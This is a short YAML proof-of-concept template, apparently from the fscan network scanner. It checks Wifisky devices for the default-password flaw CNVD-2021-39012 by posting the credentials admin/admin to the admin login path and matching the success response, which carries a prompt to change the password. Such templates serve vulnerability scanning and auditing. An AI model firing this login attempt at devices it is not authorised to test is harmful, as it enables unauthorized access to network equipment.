mirror of
https://github.com/shadow1ng/fscan.git
synced 2025-07-13 12:52:44 +08:00
13 lines
531 B
YAML
13 lines
531 B
YAML
name: poc-yaml-wifisky-default-password-cnvd-2021-39012
|
|
rules:
|
|
- method: POST
|
|
path: /login.php?action=login&type=admin
|
|
follow_redirects: false
|
|
body: >-
|
|
username=admin&password=admin
|
|
expression: |
|
|
response.status == 200 && response.body.bcontains(b"{\"success\":\"true\", \"data\":{\"id\":1}, \"alert\":\"您正在使用默认密码登录,为保证设备安全,请立即修改密码\"}")
|
|
detail:
|
|
author: Print1n(http://print1n.top)
|
|
links:
|
|
- https://www.cnvd.org.cn/flaw/show/CNVD-2021-39012 |